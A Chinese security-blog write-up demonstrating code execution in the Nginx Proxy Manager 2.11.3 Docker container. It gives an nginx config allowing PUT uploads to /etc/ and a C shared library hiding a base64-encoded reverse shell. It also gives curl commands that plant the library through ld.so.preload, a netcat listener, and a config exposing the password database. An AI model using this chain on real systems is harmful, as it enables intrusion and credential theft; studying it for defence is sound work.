

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/SecLabBlog/img/fluid.png">
  <link rel="icon" href="/SecLabBlog/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Estamel GG">
  <meta name="keywords" content="">
  
    <meta name="description" content="Nginx Proxy Manager v2.11.3 Docker Image RCE">
<meta property="og:type" content="article">
<meta property="og:title" content="Nginx Proxy Manager v2.11.3 RCE">
<meta property="og:url" content="https://estamelgg.github.io/SecLabBlog/2024/08/26/nginx_proxy_manager_rce/index.html">
<meta property="og:site_name" content="GG 的博客">
<meta property="og:description" content="Nginx Proxy Manager v2.11.3 Docker Image RCE">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://estamelgg.github.io/SecLabBlog/images/npm_rce/image.png">
<meta property="article:published_time" content="2024-08-26T02:00:00.000Z">
<meta property="article:modified_time" content="2025-08-29T09:37:43.808Z">
<meta property="article:author" content="Estamel GG">
<meta property="article:tag" content="RCE">
<meta property="article:tag" content="漏洞">
<meta property="article:tag" content="Docker">
<meta property="article:tag" content="Nginx">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://estamelgg.github.io/SecLabBlog/images/npm_rce/image.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>Nginx Proxy Manager v2.11.3 RCE - GG 的博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/SecLabBlog/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/SecLabBlog/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/SecLabBlog/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"estamelgg.github.io","root":"/SecLabBlog/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":3},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/SecLabBlog/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/SecLabBlog/js/utils.js" ></script>
  <script  src="/SecLabBlog/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 60vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/SecLabBlog/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/SecLabBlog/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/SecLabBlog/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/SecLabBlog/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/SecLabBlog/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/SecLabBlog/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/SecLabBlog/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Nginx Proxy Manager v2.11.3 RCE"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-08-26 10:00" pubdate>
          2024年8月26日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          9 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Nginx Proxy Manager v2.11.3 RCE</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h1><p>该漏洞<strong>并非</strong>是 NPM 项目的代码存在漏洞，而是 NPM Docker 环境的默认配置存在缺陷，在 NPM 用户拥有 <code>Hosts</code> 的 <code>Manage</code> 权限的情况下，可以获取<strong>容器内</strong>的 Shell 。</p>
<h1 id="搭建环境"><a href="#搭建环境" class="headerlink" title="搭建环境"></a>搭建环境</h1><p>Nginx Proxy Manager (NPM) 基于 Ubuntu + Nginx 容器化部署。</p>
<p>创建一个空目录，创建 <code>docker-compose.yml</code> 文件，内容：</p>
<figure class="highlight yml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs yml"><span class="hljs-attr">version:</span> <span class="hljs-string">&#x27;3.8&#x27;</span><br><span class="hljs-attr">services:</span><br>  <span class="hljs-attr">app:</span><br>    <span class="hljs-attr">image:</span> <span class="hljs-string">&#x27;jc21/nginx-proxy-manager:2.11.3&#x27;</span><br>    <span class="hljs-attr">restart:</span> <span class="hljs-string">unless-stopped</span><br>    <span class="hljs-attr">ports:</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">&#x27;80:80&#x27;</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">&#x27;81:81&#x27;</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">&#x27;443:443&#x27;</span><br>    <span class="hljs-attr">volumes:</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">./data:/data</span><br>      <span class="hljs-bullet">-</span> <span class="hljs-string">./letsencrypt:/etc/letsencrypt</span><br></code></pre></td></tr></table></figure>

<p>在该目录下执行以下命令，以启动容器：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker compose up -d<br><span class="hljs-comment"># docker-compose up -d</span><br></code></pre></td></tr></table></figure>

<p>访问 <a target="_blank" rel="noopener" href="http://localhost:81/login">http://localhost:81/login</a> 以进行操作。</p>
<p>初始用户密码：</p>
<figure class="highlight avrasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs avrasm"><span class="hljs-symbol">Email:</span>    admin@example.com<br><span class="hljs-symbol">Password:</span> changeme<br></code></pre></td></tr></table></figure>

<p>具体细节参考： <a target="_blank" rel="noopener" href="https://nginxproxymanager.com/guide/#quick-setup">quick-setup</a></p>
<p>用户登录后可以设置反向代理、重定向等功能。</p>
<p><img src="/SecLabBlog/images/npm_rce/image-0.png" srcset="/SecLabBlog/img/loading.gif" lazyload></p>
<p>这些功能基本上都是基于修改 <code>nginx.conf</code> 文件实现的，因此以下的内容本质上都是 <code>nginx.conf</code> 配置安全漏洞，只不过由于该项目允许用户在前端编辑和加载配置文件而能够被利用。</p>
<p>当然了，搞来搞去也就是在容器里而已，没啥意思，管好用户权限就行了。</p>
<h1 id="从文件写入到-RCE"><a href="#从文件写入到-RCE" class="headerlink" title="从文件写入到 RCE"></a>从文件写入到 RCE</h1><h2 id="允许-PUT-方式上传"><a href="#允许-PUT-方式上传" class="headerlink" title="允许 PUT 方式上传"></a>允许 PUT 方式上传</h2><p>首先新建一个 <code>Proxy Host</code>：</p>
<p><img src="/SecLabBlog/images/npm_rce/image-9.png" srcset="/SecLabBlog/img/loading.gif" lazyload></p>
<p>图中 <code>Domain Names</code> 可以写该反代服务器的 IP 或域名，总之能够通过这个地址访问到这个容器里的反代端口即可，我们假设为 <code>npm.example.com</code>。其余字段随便写应该都不影响。</p>
<p>然后通过高级设置，自定义 <code>nginx.conf</code> 配置文件以允许 <code>PUT</code> 方式上传。</p>
<p><img src="/SecLabBlog/images/npm_rce/image-1.png" srcset="/SecLabBlog/img/loading.gif" lazyload></p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs text">location /gupload/ &#123;<br>	dav_methods PUT;<br>	alias /etc/;<br>	limit_except PUT &#123;<br>		deny all;<br>	&#125;<br>	client_max_body_size 100M;<br>	dav_access user:rw;<br>	autoindex on;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>现在我们可以通过向 URL <code>http://npm.example.com/gupload/filename</code> 发送 <code>PUT</code> 请求来将文件上传到 <code>/etc/</code> 目录，上传后的文件名应该为 <code>filename</code>。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">curl -X PUT -d <span class="hljs-string">&quot;1&quot;</span> http://npm.example.com/gupload/1.txt<br></code></pre></td></tr></table></figure>

<p>可以看到文件能够被上传到容器内：</p>
<p><img src="/SecLabBlog/images/npm_rce/image-2.png" srcset="/SecLabBlog/img/loading.gif" lazyload></p>
<h2 id="关于-ld-so-preload-劫持"><a href="#关于-ld-so-preload-劫持" class="headerlink" title="关于 ld.so.preload 劫持"></a>关于 ld.so.preload 劫持</h2><p>理论上我可以通过 <code>写 SSH 私钥</code>、<code>写 Crontab</code> 的方式来实现命令执行，但是为什么要用 <code>ld.so.preload</code> 方式呢？</p>
<p>首先，这是个容器环境，没有 ssh 服务，所以写私钥没意义。</p>
<p>其次，这个容器基于 <code>Ubuntu</code>，尽管我们通过 <code>dav_access user:rw;</code> 指定了文件权限为 <code>0600</code>，但是这容器没开 <code>cron</code> 服务，执行不了命令。</p>
<p>而 <code>ld.so.preload</code> 方案则非常通用。我们不需要给上传的运行库文件设置什么权限，同时 <code>ld.so.preload</code> 文件中允许指定任意位置的 <code>so</code>。最重要的是，大部分进程在执行的时候都会预加载这个 <code>so</code>，十分甚至九分地好用。</p>
<h2 id="编译-Preload-so"><a href="#编译-Preload-so" class="headerlink" title="编译 Preload.so"></a>编译 Preload.so</h2><p>源码: <code>preload.c</code> 文件</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">//preload.c</span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/types.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-type">void</span> _init(<span class="hljs-type">void</span>) &#123;<br>	unsetenv(<span class="hljs-string">&quot;LD_PRELOAD&quot;</span>);<br>	unlink(<span class="hljs-string">&quot;/etc/ld.so.preload&quot;</span>);<br>	system(<span class="hljs-string">&quot;echo \&quot;L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4yMi4wLjEvOTA5MCAwPiYx\&quot; | base64 -d | bash -i&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>编译：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">gcc -fPIC -shared -o preload.so preload.c -nostartfiles -ldl<br></code></pre></td></tr></table></figure>

<p><img src="/SecLabBlog/images/npm_rce/image-3.png" srcset="/SecLabBlog/img/loading.gif" lazyload></p>
<h2 id="上传-Preload-so"><a href="#上传-Preload-so" class="headerlink" title="上传 Preload.so"></a>上传 Preload.so</h2><p>依次执行以下两个命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">curl -T <span class="hljs-string">&quot;preload.so&quot;</span> http://npm.example.com/gupload/preload.so<br>curl -X PUT -d <span class="hljs-string">&quot;/etc/preload.so&quot;</span> http://npm.example.com/gupload/ld.so.preload<br></code></pre></td></tr></table></figure>

<p>执行后，<code>preload.so</code> 和 <code>ld.so.preload</code> 文件应该被会上传到 <code>/etc/</code> 路径下。</p>
<h2 id="执行"><a href="#执行" class="headerlink" title="执行"></a>执行</h2><p>成功上传后，理论上此时执行任何二进制程序，都会导致恶意 <code>.so</code> 被执行。</p>
<p>开启监听端口：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc -lvp 9090<br></code></pre></td></tr></table></figure>

<p>根据项目代码，在 <code>WebUI</code> 中，保存配置、禁用和启用配置会造成执行 <code>nginx</code> 命令：</p>
<p><img src="/SecLabBlog/images/npm_rce/image-4.png" srcset="/SecLabBlog/img/loading.gif" lazyload></p>
<p>项目代码：</p>
<p><img src="/SecLabBlog/images/npm_rce/image-5.png" srcset="/SecLabBlog/img/loading.gif" lazyload></p>
<p>所以只要禁用配置，就可以执行 <code>nginx</code> 程序，同时造成执行恶意 <code>so</code> 文件以及里面的反弹 <code>Shell</code> 命令。</p>
<p><img src="/SecLabBlog/images/npm_rce/image-6.png" srcset="/SecLabBlog/img/loading.gif" lazyload></p>
<h1 id="文件读取"><a href="#文件读取" class="headerlink" title="文件读取"></a>文件读取</h1><p>相对于 RCE，这个功能显得不是很危险。</p>
<p>同样的修改 <code>nginx.conf</code> 配置文件。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">location /ggimgs &#123; <br>	<span class="hljs-built_in">alias</span> /data/database.sqlite;<br>&#125;<br></code></pre></td></tr></table></figure>

<p><img src="/SecLabBlog/images/npm_rce/image-7.png" srcset="/SecLabBlog/img/loading.gif" lazyload></p>
<p>这样我们就可以通过访问 <code>http://npm.example.com/ggimgs</code> 来下载容器内的 <code>database.sqlite</code> 文件。</p>
<p>这个文件是 <code>npm</code> 的数据库，里面保存了用户密码。同理也可以下载别的文件（也没别的什么有用的文件了）。</p>
<p><img src="/SecLabBlog/images/npm_rce/image-8.png" srcset="/SecLabBlog/img/loading.gif" lazyload></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/SecLabBlog/categories/%E6%BC%8F%E6%B4%9E/" class="category-chain-item">漏洞</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/SecLabBlog/tags/RCE/" class="print-no-link">#RCE</a>
      
        <a href="/SecLabBlog/tags/%E6%BC%8F%E6%B4%9E/" class="print-no-link">#漏洞</a>
      
        <a href="/SecLabBlog/tags/Docker/" class="print-no-link">#Docker</a>
      
        <a href="/SecLabBlog/tags/Nginx/" class="print-no-link">#Nginx</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Nginx Proxy Manager v2.11.3 RCE</div>
      <div>https://estamelgg.github.io/SecLabBlog/2024/08/26/nginx_proxy_manager_rce/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Estamel GG</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年8月26日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/SecLabBlog/2024/10/14/headscale_deploy/" title="Headscale 0.23.0 部署">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Headscale 0.23.0 部署</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/SecLabBlog/2024/08/24/cobaltstrike_vpn/" title="Cobalt Strike VPN 内网穿透">
                        <span class="hidden-mobile">Cobalt Strike VPN 内网穿透</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/SecLabBlog/js/events.js" ></script>
<script  src="/SecLabBlog/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/SecLabBlog/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/SecLabBlog/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/SecLabBlog/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
